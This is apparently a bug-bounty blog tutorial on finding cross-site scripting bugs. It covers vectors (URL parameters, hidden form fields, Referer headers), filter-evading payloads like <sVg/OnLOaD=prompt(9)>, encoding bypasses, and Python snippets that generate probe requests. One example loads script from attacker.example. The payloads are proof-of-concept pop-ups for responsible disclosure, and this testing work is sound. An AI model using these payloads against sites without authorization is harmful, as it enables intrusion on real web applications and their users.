Modern techniques for XSS discovery

The most common web app bug that meets the minimum qualifications for bug bounty programs is decidedly cross-site scripting. I was a little frustrated with the introductory pages I found on the topic while researching over the past few months, so this is my attempt to slightly improve the state of affairs. If you want to get your name listed in your first Hall of Fame or receive your first bug bounty prize, you could do worse than to read on.

Quick intro to how XSS works

Cross-site scripting is a bug where an attacker can inject arbitrary HTML or Javascript into a vulnerable page. There are a couple of different flavors of XSS: reflected and persistent.

Reflected XSS bugs happen when a page takes user input and reflects that input in the code of the page. If the page does not filter the user input for characters that have special meaning in HTML/Javascript, like double quotes (") or angle brackets (< >), then the attacker can inject malicious code. Example: if a site reflects YourUsername in the page’s code, then you could craft a link whose username parameter is <script>alert(1)</script>. Send that link to a victim and their browser will run whatever javascript you put between the <script> tags as if it were actually part of the site’s source code. In this case it will simply open a pop up with the message “1”. For a look at the kind of power a simple reflected XSS like this might have, check out the BeEF project.
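
To make the mechanics concrete, here is a minimal Python sketch (the function name and page are hypothetical) of the server-side difference between a vulnerable reflection and a filtered one:

```python
import html

def render_greeting(username: str, escape: bool = True) -> str:
    """Build the HTML a hypothetical page returns for ?user=<username>.

    With escape=False the page reflects input verbatim -- the XSS bug.
    With escape=True special characters are neutralized into entities.
    """
    safe = html.escape(username, quote=True) if escape else username
    return "<p>Hello, {}!</p>".format(safe)

payload = "<script>alert(1)</script>"
# Vulnerable: the payload survives intact and a browser would execute it.
print(render_greeting(payload, escape=False))
# Filtered: angle brackets become &lt; and &gt;, so it renders as plain text.
print(render_greeting(payload, escape=True))
```

An XSS bug is exactly the escape=False branch making it into production.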

Persistent XSSes are when a page takes user input and stores it server-side unfiltered. The quintessential example is forum software that doesn’t filter user posts. If a user makes a thread post that includes something like <script src="http://attacker.example/malicious.js"></script> then anyone who visits that thread will have malicious.js run within their browser automatically. These are obviously more severe vulnerabilities than reflected XSS since the victim doesn’t have to be socially engineered into clicking a specially crafted link. Persistent XSSes can lead to self-replicating XSS worms, as seen in MySpace a long time ago and TweetDeck more recently.

Often people talk about DOM-based XSS as being a third class of XSS, but it seems to me these are really just a subtype of reflected XSS since they cannot be stored on the server. They are a bit sneakier than classic reflected XSSes, though, since the server never even knows that DOM-based XSSes are being triggered. These types of XSS are significantly more difficult to find, especially through manual testing. If you’re interested in discovering these you should probably look into using the premium DOMinatorPro tool, but other than that we’re going to consider DOM-based XSS out of scope for this article.

XSS attack vectors

Any user input on a page is an XSS attack vector. URL variables (and the URL itself in the case of DOM-based XSS), form fields both hidden and explicit, and HTTP headers are all places where users can supply content and exploit XSS bugs. I’ll use the simple XSS payload <script>alert(1)</script> for the following examples, but we will discuss better payloads a little further down.

If my experience and my readings of others’ experience can be trusted, URL variables are the most common XSS attack vector. Take for example a URL like http://example.com/page?id=123&date=081014&score=987439. This URL has 3 XSS attack vectors: the id variable, the date variable, and the score variable. To test this URL for XSS, one might try testing the id variable by visiting http://example.com/page?id=<script>alert(1)</script>&date=081014&score=987439. If the id variable is vulnerable, you will see a javascript pop up that just says “1” inside it. Simple.
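
That per-parameter routine is easy to automate. Here is a sketch using only the Python standard library (the example URL is hypothetical); in real use you would fetch each generated URL and check whether the probe comes back unencoded in the response body:

```python
from urllib.parse import urlsplit, parse_qsl, urlencode, urlunsplit

PROBE = "<script>alert(1)</script>"

def candidate_urls(url: str):
    """Yield one test URL per query parameter, with the probe substituted in.

    Each yielded URL mutates exactly one parameter, leaving the rest
    at their original values so the page still loads normally.
    """
    parts = urlsplit(url)
    params = parse_qsl(parts.query, keep_blank_values=True)
    for i, (name, _) in enumerate(params):
        mutated = list(params)
        mutated[i] = (name, PROBE)  # urlencode percent-encodes the probe,
        # just as a browser would; the server decodes it before reflecting.
        yield urlunsplit(parts._replace(query=urlencode(mutated)))

for u in candidate_urls("http://example.com/page?id=123&date=081014&score=987439"):
    print(u)
```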

Form input vectors are probably the next most common. Within this vector you’ll most often see bugs in things like the search box that many sites employ. Simple exploitation of this vector would be to enter <script>alert(1)</script> in the search box and hit enter. If you get a javascript pop up on the returned page then you’ve found an XSS bug. Search boxes and text boxes in general are very conspicuous places where sites take user input, so if you’re testing a big, well-funded site the programmers will rarely be lazy or uninformed enough to leave input unfiltered in these places.
However, tons of big sites use hidden form fields all over the place. You can identify these by looking at the source code: Ctrl-F to search for <form and look for type="hidden" value="something". These are more often overlooked since there’s no way for a user inside a normal browser to modify a hidden form field value. To modify a hidden form field value, you must POST directly to the form’s action URL with a payload like: HiddenVar1=injecthere&HiddenVar2=injecthere&HiddenVar3=SoOnAndSoForth. I found this kind of XSS in a major telco’s site.
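
Outside a browser you can build that POST with any HTTP client. A minimal sketch with Python’s urllib (the URL and field names are hypothetical):

```python
from urllib.parse import urlencode
import urllib.request

def build_hidden_field_post(url: str, fields: dict) -> urllib.request.Request:
    """Build the POST a normal browser never lets you send: hidden form
    field values overridden with an XSS probe. Send it with
    urllib.request.urlopen(req) and grep the response for the probe.
    """
    body = urlencode(fields).encode()
    return urllib.request.Request(
        url,
        data=body,
        method="POST",
        headers={"Content-Type": "application/x-www-form-urlencoded"},
    )

req = build_hidden_field_post(
    "http://example.com/submit",  # placeholder target
    {"HiddenVar1": "<script>alert(1)</script>", "HiddenVar2": "normal"},
)
print(req.data.decode())
```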

Last, we have HTTP headers as attack vectors. I have found that, as a whole, this is probably the rarest of XSS-vulnerable vectors, meaning that if you took a census of the whole internet you would find the fewest XSS vulnerabilities coming from this vector. Not many sites have a reason to reflect an HTTP header value directly into the source code of the page. That being said, it does seem to be a disproportionately common vulnerability amongst high value targets like very large websites and sites that participate in bug bounty programs. The Referer header, in particular, seems to be a thorn in the side of major websites. This might stem from the fact that the Referer header doesn’t always exist when you hit a URL, so it is particularly easy for a programmer or QA engineer to forget to filter input from this vector. The headers I believe are most commonly XSS vulnerable are Referer, Cookie, and User-Agent. I have personally only found Referer header XSSes in the wild, though I have seen at least one example of a Cookie header-based XSS, and I have never seen a User-Agent XSS despite having read that it should be a place to test. I’ve heard of some other headers that people have discovered were reflected unfiltered in source code, but I cannot find hard evidence of any of them. Please contribute a comment with any other headers you’ve seen in the wild that have been vulnerable to XSS.

I discovered an XSS vulnerability in Amazon’s homepage due to the Referer header recently. Amazon returned the Referer header value unfiltered in the homepage’s source code within a javascript function that seemed to do something with ads on the page. When another large site joined HackerOne’s bug bounty program, it also had an XSS in its homepage due to the unfiltered reflection of the Referer header value. This attack vector, like hidden form fields, requires special tools/techniques to exploit, which we’ll get to soon.
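
Testing a header vector just means sending a raw request with the header under your control. A sketch with Python’s urllib (the URL is a placeholder); fetch the request with urlopen and grep the response for the probe:

```python
import urllib.request

PROBE = '"><script>alert(1)</script>'

def build_referer_probe(url: str) -> urllib.request.Request:
    """Build a GET whose Referer header carries an XSS probe.

    A normal browser won't let you set Referer to an arbitrary value;
    a raw HTTP client will. If the probe comes back unencoded in the
    response body, the page reflects Referer unfiltered.
    """
    req = urllib.request.Request(url)
    req.add_header("Referer", url + "?x=" + PROBE)
    return req

req = build_referer_probe("http://example.com/")
print(req.get_header("Referer"))
```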

XSS payloads

When looking at most intro-to-XSS guides, they pretty much all say the same thing: <script>alert(1)</script>. This payload is OK, but why would you use a payload that’s longer than necessary and specifically gets caught by a ton of filters? Instead of <script>alert(1)</script>, use this:

<sVg/OnLOaD=prompt(9)>
It’s the shortest consistently working payload I have found, and it has a number of benefits. You will rarely if ever encounter a WAF or filter that specifically looks for the <svg> tag as a potential XSS attempt. It has no spaces, which are sometimes filtered out. It uses prompt rather than alert, since alert is very commonly filtered or looked for by WAFs. It uses a digit as the prompt message rather than a string, which would require quotes, and the digit it uses is not “1”, which is also very commonly picked up as an XSS attempt by filters and WAFs. Last, we obfuscate it from poorly written regex filtering by throwing in some capitals.

XSS bugs can be reflected in only two places within the source code of a site: between HTML tags, like:

<b>INJECTED INPUT</b>

or inside an HTML attribute, like:

<a href="INJECTED INPUT">

If the XSS bug is between HTML tags then you’d use <sVg/OnLOaD=prompt(9)>. If it’s inside an HTML attribute then you’d need to close the attribute value with a quote, or more likely a double quote followed by a closing angle bracket, so it’d look like "><sVg/OnLOaD=prompt(9)>. In my experience you will probably find slightly more XSS bugs within HTML attributes than just dangling between HTML tags. You will also see some injection points inside javascript functions, but those technically fall into the between-tag category. You can often exploit those without < or > by closing out the function with the right combination of quotes and parentheses, a semicolon, then a prompt(9). The payload might end up looking something like this, but it will be very situationally dependent:

x'; prompt(9);

The x'; might close out a variable that’s being defined and end that javascript statement, allowing you to inject your own javascript afterwards. Ideally your < and > will just be unfiltered so you don’t have to figure out how to get working Javascript going, and your payload will look like:

'</script><sVg/OnLOaD=prompt(9)>
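
The context-to-payload mapping above can be summarized in a few lines. A sketch (the context labels are my own shorthand, not standard terms):

```python
def payload_for_context(context: str) -> str:
    """Pick a payload shape based on where the probe was reflected.

    context is one of "between_tags", "attribute", or "js_string",
    mirroring the three injection points discussed above.
    """
    base = "<sVg/OnLOaD=prompt(9)>"
    if context == "between_tags":
        return base                 # inject the tag directly
    if context == "attribute":
        return '">' + base          # close the attribute value, then the tag
    if context == "js_string":
        return "x'; prompt(9); //"  # end the string and statement, comment out the rest
    raise ValueError("unknown context: " + context)

for ctx in ("between_tags", "attribute", "js_string"):
    print(ctx, "->", payload_for_context(ctx))
```
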
One of the problems with pages like OWASP’s XSS payload page is that it shows a million XSS payloads for various situations but doesn’t make any effort to organize them by usefulness. The vast majority of them require < and > to be unfiltered. If < and > are unfiltered, then there’s a 95% chance <sVg/OnLOaD=prompt(9)> will work just fine. Other payload examples have unnecessary features that increase the chance of them getting filtered, like adding spaces to the pop up message. Some use String.fromCharCode for the pop up message to avoid quotes in case quotes are filtered, but that just extends the length of the payload unnecessarily. Just use a single digit as the pop up message to avoid hitting any input character limits.

Avoiding filters

Basically it all boils down to whether or not ", ', <, and > are filtered. Those are the most important characters for exploiting XSS. If they are filtered, then you have dozens and dozens of slightly different ways to encode those characters, but only a few are actually high percentage. URL encoding and HTML encoding are the only two kinds of filter-evading encoding schemes that I’ve seen work in the wild in my limited experience. That doesn’t mean you shouldn’t try others, but if you still can’t bypass the filter with those two kinds of encoding, then the majority of the time you’re not going to find success. HTML encoding generally won’t work for URL parameter XSS bugs, but it was used to massive effect by bug hunter behrouz against Yahoo!. Behrouz was able to sneak quotes past the Yahoo! filter for his form field persistent XSS on their comment system by HTML encoding them as &quot;. This led to an XSS exploit against virtually every Yahoo! property, since they all used the same comment form system. URL encoding a quote would look like %22. There are resources listing a myriad of ways to encode characters, but generally URL and HTML encoding are all you’ll need to try.
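
Python’s standard library can generate both encodings for the four characters that matter, which is handy when hand-building test payloads:

```python
from urllib.parse import quote
import html

# The four characters that matter most for XSS, with their URL and
# HTML entity encodings. Note the single quote HTML-encodes to &#x27;.
for ch in ['"', "'", "<", ">"]:
    print("%s  URL: %s  HTML: %s" % (ch, quote(ch, safe=""), html.escape(ch, quote=True)))
```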

Manual XSS testing tools

Firefox is the main tool you will require. You could get fancy and use ZAP or Burp in addition to Firefox, but it’s not necessary to open a large Java program just to edit some headers. The reason we use Firefox and not any of the other big 3 browsers is that Chrome and IE both have XSS filters built into them which are rather effective against our run-of-the-mill reflected XSS attacks. Firefox only respects the Content Security Policy header, which rarely gets in the way. If you do suspect CSP is getting in the way of your proof-of-concept screenshot of the javascript pop up, then you might want to use Xenotix to collect that evidence. To fully test for XSS you will need to add the extensions HackBar and Tamper Data.

HackBar should be used for testing XSS via POST payloads, like changing a hidden form field value. To do that, just enter the URL in the top half of the HackBar toolbar, then the POST payload in the bottom half, and hit Execute. Tamper Data can add, remove, and edit HTTP headers as well as bypass client-side filtering. An example of client-side filtering would be the forum software vendor XSS I found a while back. On their sign up page they used javascript that ran in your browser to filter out dangerous characters. All one had to do to exploit this vulnerability was enter legal characters in the form, fire up Tamper Data, tamper with just the initial request (uncheck the checkbox in the pop up you’ll see), enter the XSS payload in one or more of the POST parameter values on the right, and send it on its way to the server, which assumes the characters are safe to render.


The logic and methods above have netted me many responsible disclosures against an assortment of high traffic and bug bounty-participating sites. I had a little help from my buddy Python in the discovery of some of those vulnerabilities, but that is for the next post.
